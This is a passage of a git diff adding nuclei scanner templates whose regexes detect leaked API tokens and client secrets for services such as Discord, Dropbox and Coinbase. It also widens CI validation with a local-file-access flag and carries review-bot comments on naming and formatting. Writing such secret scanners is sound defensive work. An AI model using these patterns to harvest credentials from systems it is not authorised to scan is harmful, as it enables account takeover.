diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml
index c7beb05704..005e5387b7 100644
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@@ -25,5 +25,5 @@ jobs:
 - name: Template Validation
 run: |
 cp -r ${{ github.workspace }} $HOME
- nuclei -duc -validate
- nuclei -duc -validate -w ./workflows
\ No newline at end of file
+ nuclei -duc -validate -allow-local-file-access
+ nuclei -duc -validate -w ./workflows -allow-local-file-access
\ No newline at end of file
diff --git a/.new-additions b/.new-additions
index 89b2f68224..0be803798b 100644
--- a/.new-additions
+++ b/.new-additions
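Review bot: The two added `nuclei -duc -validate ... -allow-local-file-access` lines record no reason for the new flag, and since it widens what templates may read from the runner's filesystem during validation, the motivation should sit next to the step rather than only in the commit. Presumably it is needed because the `file/` protocol templates added in this same change (file/keys/*) do not pass `-validate` without it; a comment above `run: |` such as `# -allow-local-file-access: required for the file/ protocol templates (file/keys/*) to pass -validate` would make that explicit and stop a later cleanup from dropping it. The step belongs to a job whose definition starts above the hunk.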
@@ -1,3 +1,94 @@
+file/keys/beamer-api-token.yaml
+file/keys/bitbucket/bitbucket-client-id.yaml
+file/keys/bitbucket/bitbucket-client-secret.yaml
+file/keys/bittrex/bittrex-access-key.yaml
+file/keys/bittrex/bittrex-secret-key.yaml
+file/keys/clojars-api-token.yaml
+file/keys/codecov-access-token.yaml
+file/keys/coinbase-access-token.yaml
+file/keys/confluent/confluent-access-token.yaml
+file/keys/confluent/confluent-secret-token.yaml
+file/keys/contentful-api-token.yaml
+file/keys/databricks-api-token.yaml
+file/keys/datadog-access-token.yaml
+file/keys/discord/discord-api-token.yaml
+file/keys/discord/discord-cilent-secret.yaml
+file/keys/discord/discord-client-id.yaml
+file/keys/doppler-api-token.yaml
+file/keys/droneci-access-token.yaml
+file/keys/dropbox/dropbox-api-token.yaml
+file/keys/dropbox/dropbox-longlived-token.yaml
+file/keys/dropbox/dropbox-shortlived-token.yaml
+file/keys/duffel-api-token.yaml
+file/keys/easypost/easypost-api-token.yaml
+file/keys/easypost/easypost-test-token.yaml
+file/keys/etsy-access-token.yaml
+file/keys/facebook/facebook-api-token.yaml
+file/keys/fastly-api-token.yaml
+file/keys/finicity/finicity-api-token.yaml
+file/keys/finicity/finicity-client-secret.yaml
+file/keys/finnhub-access-token.yaml
+file/keys/flickr-access-token.yaml
+file/keys/flutter/flutterwave-encryption-key.yaml
+file/keys/flutter/flutterwave-public-key.yaml
+file/keys/flutter/flutterwave-secret-key.yaml
+file/keys/frameio-api-token.yaml
+file/keys/freshbooks-access-token.yaml
+file/keys/gitter-access-token.yaml
+file/keys/gocardless-api-token.yaml
+file/keys/grafana/grafana-api-key.yaml
+file/keys/grafana/grafana-cloud-api-token.yaml
+file/keys/grafana/grafana-service-account-token.yaml
+file/keys/hashicorp-api-token.yaml
+file/keys/zendesk-secret-key.yaml
 http/cves/2017/CVE-2017-7925.yaml
+http/cves/2023/CVE-2023-28665.yaml
+http/cves/2023/CVE-2023-3345.yaml
+http/cves/2023/CVE-2023-3460.yaml
 http/cves/2023/CVE-2023-37270.yaml
-miscellaneous/spnego.yaml
+http/default-logins/yealink/yealink-default-login.yaml
+http/exposed-panels/anaqua-login-panel.yaml
+http/exposures/tokens/beamer/beamer-token.yaml
+http/exposures/tokens/bitbucket/bitbucket-clientid.yaml
+http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml
+http/exposures/tokens/bittrex/bittrex-accesskey.yaml
+http/exposures/tokens/bittrex/bittrex-secretkey.yaml
+http/exposures/tokens/clojars/clojars-token.yaml
+http/exposures/tokens/codecov/codecov-accesstoken.yaml
+http/exposures/tokens/coinbase/coinbase-accesstoken.yaml
+http/exposures/tokens/confluent/confluent-accesstoken.yaml
+http/exposures/tokens/confluent/confluent-secretkey.yaml
+http/exposures/tokens/contentful/contentful-token.yaml
+http/exposures/tokens/databricks/databricks-token.yaml
+http/exposures/tokens/datadog/datadog-accesstoken.yaml
+http/exposures/tokens/discord/discord-clientid.yaml
+http/exposures/tokens/discord/discord-clientsecret.yaml
+http/exposures/tokens/discord/discord-token.yaml
+http/exposures/tokens/doppler/doppler-token.yaml
+http/exposures/tokens/droneci/droneci-accesstoken.yaml
+http/exposures/tokens/dropbox/dropbox-long-token.yaml
+http/exposures/tokens/dropbox/dropbox-short-token.yaml
+http/exposures/tokens/dropbox/dropbox-token.yaml
+http/exposures/tokens/duffel/duffel-token.yaml
+http/exposures/tokens/easypost/easypost-testtoken.yaml
+http/exposures/tokens/easypost/easypost-token.yaml
+http/exposures/tokens/etsy/etsy-accesstoken.yaml
+http/exposures/tokens/facebook/facebook-token.yaml
+http/exposures/tokens/fastly/fastly-token.yaml
+http/exposures/tokens/finicity/finicity-clientsecret.yaml
+http/exposures/tokens/finicity/finicity-token.yaml
+http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
+http/exposures/tokens/flickr/flickr-accesstoken.yaml
+http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml
+http/exposures/tokens/flutter/flutterwave-publickey.yaml
+http/exposures/tokens/flutter/flutterwave-secretkey.yaml
+http/exposures/tokens/frameio/frameio-token.yaml
+http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml
+http/exposures/tokens/gitter/gitter-token.yaml
+http/exposures/tokens/gocardless/gocardless-token.yaml
+http/exposures/tokens/grafana/grafana-cloud-token.yaml
+http/exposures/tokens/grafana/grafana-key.yaml
+http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml
+http/exposures/tokens/hashicorp/hashicorp-token.yaml
+http/exposures/tokens/zendesk/zendesk-key.yaml
+http/miscellaneous/spnego.yaml
diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml
new file mode 100644
index 0000000000..e000a0b4a5
--- /dev/null
+++ b/file/keys/beamer-api-token.yaml
@@ -0,0 +1,22 @@
+id: beamer-api-token
+
+info:
+ name: Beamer API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go
+ metadata:
+ verified: true
+ tags: beamer,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml
new file mode 100644
index 0000000000..fb1a6b2891
--- /dev/null
+++ b/file/keys/bitbucket/bitbucket-client-id.yaml
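Review bot: `file/keys/beamer-api-token.yaml` is added without a trailing newline (the `\ No newline at end of file` marker follows its last `regex` entry), and every other new file/keys template in this commit shows the same marker; yamllint's `new-line-at-end-of-file` rule flags this and the next edit to any of these files will produce a noisy diff. Ending each file with a single newline after the regex line is the fix. The `reference` entries point at the semgrep-rules mirror of the gitleaks rule rather than the gitleaks repository itself, which is fine but worth knowing when the upstream pattern changes.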
@@ -0,0 +1,22 @@
+id: bitbucket-client-id
+
+info:
+ name: BitBucket Client ID
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go
+ metadata:
+ verified: true
+ tags: bitbucket,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml
new file mode 100644
index 0000000000..5320710594
--- /dev/null
+++ b/file/keys/bitbucket/bitbucket-client-secret.yaml
@@ -0,0 +1,22 @@
+id: bitbucket-client-secret
+
+info:
+ name: BitBucket Client Secret
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go
+ metadata:
+ verified: true
+ tags: bitbucket,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml
new file mode 100644
index 0000000000..5d759a86c5
--- /dev/null
+++ b/file/keys/bittrex/bittrex-access-key.yaml
@@ -0,0 +1,22 @@
+id: bittrex-access-key
+
+info:
+ name: Bittrex Access Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go
+ metadata:
+ verified: true
+ tags: bittrex,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml
new file mode 100644
index 0000000000..22927db671
--- /dev/null
+++ b/file/keys/bittrex/bittrex-secret-key.yaml
@@ -0,0 +1,22 @@
+id: bittrex-secret-key
+
+info:
+ name: Bittrex Secret Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go
+ metadata:
+ verified: true
+ tags: bittrex,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml
new file mode 100644
index 0000000000..84986e8cbc
--- /dev/null
+++ b/file/keys/clojars-api-token.yaml
@@ -0,0 +1,22 @@
+id: clojars-api-token
+
+info:
+ name: Clojars API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go
+ metadata:
+ verified: true
+ tags: clojars,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(CLOJARS_)[a-z0-9]{60}
\ No newline at end of file
diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml
new file mode 100644
index 0000000000..e6df4554b7
--- /dev/null
+++ b/file/keys/codecov-access-token.yaml
@@ -0,0 +1,22 @@
+id: codecov-access-token
+
+info:
+ name: Codecov Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go
+ metadata:
+ verified: true
+ tags: codecov,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml
new file mode 100644
index 0000000000..8892a9a732
--- /dev/null
+++ b/file/keys/coinbase-access-token.yaml
@@ -0,0 +1,22 @@
+id: coinbase-access-token
+
+info:
+ name: Coinbase Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go
+ metadata:
+ verified: true
+ tags: coinbase,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml
new file mode 100644
index 0000000000..caf2b34f3f
--- /dev/null
+++ b/file/keys/confluent/confluent-access-token.yaml
@@ -0,0 +1,22 @@
+id: confluent-access-token
+
+info:
+ name: Confluent Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go
+ metadata:
+ verified: true
+ tags: confluent,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml
new file mode 100644
index 0000000000..dfce7ab9ff
--- /dev/null
+++ b/file/keys/confluent/confluent-secret-token.yaml
@@ -0,0 +1,22 @@
+id: confluent-secret-token
+
+info:
+ name: Confluent Secret Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go
+ metadata:
+ verified: true
+ tags: confluent,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml
new file mode 100644
index 0000000000..cca691374d
--- /dev/null
+++ b/file/keys/contentful-api-token.yaml
@@ -0,0 +1,22 @@
+id: contentful-api-token
+
+info:
+ name: Contentful Delivery API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go
+ metadata:
+ verified: true
+ tags: contentful,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml
new file mode 100644
index 0000000000..aadaf4675a
--- /dev/null
+++ b/file/keys/databricks-api-token.yaml
@@ -0,0 +1,22 @@
+id: databricks-api-token
+
+info:
+ name: Databricks API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go
+ metadata:
+ verified: true
+ tags: databricks,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml
new file mode 100644
index 0000000000..92ffcfdd69
--- /dev/null
+++ b/file/keys/datadog-access-token.yaml
@@ -0,0 +1,22 @@
+id: datadog-access-token
+
+info:
+ name: Datadog Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go
+ metadata:
+ verified: true
+ tags: datadog,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml
new file mode 100644
index 0000000000..28568c6541
--- /dev/null
+++ b/file/keys/discord/discord-api-token.yaml
@@ -0,0 +1,22 @@
+id: discord-api-token
+
+info:
+ name: Discord API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go
+ metadata:
+ verified: true
+ tags: discord,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml
new file mode 100644
index 0000000000..02c90879de
--- /dev/null
+++ b/file/keys/discord/discord-cilent-secret.yaml
@@ -0,0 +1,22 @@
+id: discord-client-secret
+
+info:
+ name: Discord Client Secret
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go
+ metadata:
+ verified: true
+ tags: discord,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml
new file mode 100644
index 0000000000..725f8e0f48
--- /dev/null
+++ b/file/keys/discord/discord-client-id.yaml
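Review bot: The new file is added as `file/keys/discord/discord-cilent-secret.yaml` while its `id` is `discord-client-secret`; the path transposes two letters of "client", so the file name no longer matches the template id, and the `.new-additions` entry in this commit carries the same misspelling. The sibling `discord-client-id.yaml` and `discord-api-token.yaml` in this change follow the file-name-equals-id pattern, so this looks like a typo rather than intent. Renaming to `file/keys/discord/discord-client-secret.yaml` and updating the `.new-additions` line keeps the two in step and avoids anyone later adding a correctly spelled duplicate.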
@@ -0,0 +1,22 @@
+id: discord-client-id
+
+info:
+ name: Discord Client ID
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go
+ metadata:
+ verified: true
+ tags: discord,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml
new file mode 100644
index 0000000000..925537324a
--- /dev/null
+++ b/file/keys/doppler-api-token.yaml
@@ -0,0 +1,22 @@
+id: doppler-api-token
+
+info:
+ name: Doppler API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go
+ metadata:
+ verified: true
+ tags: doppler,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (dp\.pt\.)(?i)[a-z0-9]{43}
\ No newline at end of file
diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml
new file mode 100644
index 0000000000..fb9ede3c62
--- /dev/null
+++ b/file/keys/droneci-access-token.yaml
@@ -0,0 +1,22 @@
+id: droneci-access-token
+
+info:
+ name: Droneci Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go
+ metadata:
+ verified: true
+ tags: droneci,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml
new file mode 100644
index 0000000000..8393139877
--- /dev/null
+++ b/file/keys/dropbox/dropbox-api-token.yaml
@@ -0,0 +1,22 @@
+id: dropbox-api-token
+
+info:
+ name: Dropbox API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go
+ metadata:
+ verified: true
+ tags: dropbox,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml
new file mode 100644
index 0000000000..7ba943f750
--- /dev/null
+++ b/file/keys/dropbox/dropbox-longlived-token.yaml
@@ -0,0 +1,22 @@
+id: dropbox-longlived-token
+
+info:
+ name: Dropbox Long Lived API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go
+ metadata:
+ verified: true
+ tags: dropbox,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml
new file mode 100644
index 0000000000..d164b0b3d5
--- /dev/null
+++ b/file/keys/dropbox/dropbox-shortlived-token.yaml
@@ -0,0 +1,22 @@
+id: dropbox-shortlived-token
+
+info:
+ name: Dropbox Short Lived API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go
+ metadata:
+ verified: true
+ tags: dropbox,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml
new file mode 100644
index 0000000000..c306cef35a
--- /dev/null
+++ b/file/keys/duffel-api-token.yaml
@@ -0,0 +1,22 @@
+id: duffel-api-token
+
+info:
+ name: Duffel API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go
+ metadata:
+ verified: true
+ tags: duffel,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - duffel_(test|live)_(?i)[a-z0-9_\-=]{43}
\ No newline at end of file
diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml
new file mode 100644
index 0000000000..61013edd56
--- /dev/null
+++ b/file/keys/easypost/easypost-api-token.yaml
@@ -0,0 +1,22 @@
+id: easypost-api-token
+
+info:
+ name: Easypost Test API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml
+ metadata:
+ verified: true
+ tags: easypost,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - EZAK(?i)[a-z0-9]{54}
\ No newline at end of file
diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml
new file mode 100644
index 0000000000..13f04d92f6
--- /dev/null
+++ b/file/keys/easypost/easypost-test-token.yaml
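Review bot: `file/keys/easypost/easypost-api-token.yaml` sets `name: Easypost Test API Token`, which is the display name of the separate `easypost-test-token.yaml` added in the next hunk; judging by this file's id and its `EZAK` prefix versus `EZTK` in the test template, this one covers the non-test key, so the two templates would report under the same name and the production finding would read as a test-key finding. The line should read `name: Easypost API Token`. The two `reference` entries are also listed `.go` before `.yaml`, the reverse of every other template in this change; not wrong, just inconsistent.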
@@ -0,0 +1,22 @@
+id: easypost-test-token
+
+info:
+ name: Easypost Test API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go
